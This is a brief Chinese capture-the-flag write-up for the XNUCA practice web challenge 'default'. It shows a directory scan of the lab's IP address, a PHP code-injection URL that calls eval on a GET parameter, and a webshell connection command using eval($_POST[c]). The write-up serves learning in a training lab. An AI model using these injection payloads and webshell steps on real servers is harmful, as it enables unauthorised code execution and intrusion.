[XNUCA 练习靶场](web)default


简介 :
default
(破解人数:8)

描述:主页都没有了,就不要扫我了
http://218.76.35.74:20131


主页啥都没有 , 不扫一波还等着干嘛 ?

SourceLeakHacker ›› python SourceLeakHacker.py http://218.76.35.74:20131/ 32 32
 [ 403 ]  Checking : http://218.76.35.74:20131/
 [ 403 ]  Checking : http://218.76.35.74:20131/.htpasswd
 [ 403 ]  Checking : http://218.76.35.74:20131/.htaccess
 [ 403 ]  Checking : http://218.76.35.74:20131/.hta
 [ 403 ]  Checking : http://218.76.35.74:20131/cgi-bin//
 [ 403 ]  Checking : http://218.76.35.74:20131/cgi-bin/
 [ 403 ]  Checking : http://218.76.35.74:20131/error/
 [ 200 ]  Checking : http://218.76.35.74:20131/icons/
 [ 200 ]  Checking : http://218.76.35.74:20131/index2.php/

这里就不得不体现出一个强大的扫描器的重要性了

SourceLeakHacker

[XNUCA 练习靶场](web)default_第1张图片
image.png
http://218.76.35.74:20131/index2.php?hello=%27%27);eval($_GET[c]&c=phpinfo();
[XNUCA 练习靶场](web)default_第2张图片
image.png

照例 [Webshell-Sniper] 连接一波 :

python sniper.py 'http://218.76.35.74:20131/index2.php?hello=);eval($_POST[c]' POST c
[XNUCA 练习靶场](web)default_第3张图片
image.png
[XNUCA 练习靶场](web)default_第4张图片
image.png

你可能感兴趣的:([XNUCA 练习靶场](web)default)